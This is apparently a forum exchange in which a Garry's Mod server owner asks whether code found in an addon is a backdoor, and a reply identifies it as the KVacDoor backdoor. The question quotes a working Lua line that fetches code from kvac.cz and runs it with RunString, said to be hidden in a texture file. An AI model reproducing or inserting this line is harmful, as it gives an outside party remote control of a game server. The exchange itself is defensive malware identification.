I received a sus version of a addon (gmod) and it has this inside:
timer.Simple(1, function() http.Fetch("https://kvac.cz/f.php?key=2SzqLfShfxnu81uPmMOi", function(b) RunString(b, ":", false) end)end)
and also another file in 'materials/npc/' called 'help.vtf' with the same code inside.
Could you help me to know if it is a backdoor or other malicious programm please ?
(and I also added to total lua file: https://mega.nz/file/tLtnwC4Y#r5wqK-JRQPm3BZrA3x9FUIkzw5rjXgFq4HG8pf0yuMA)
The code is malicious, the code is a common backdoor called KVacDoor, it allows the developer to execute lua scripts, console commands and take control over your server files.
If you follow the base URL of the fetch request to https://kvac.cz you can learn more about this backdoor and how it functions.
I would recommend uninstalling the addon.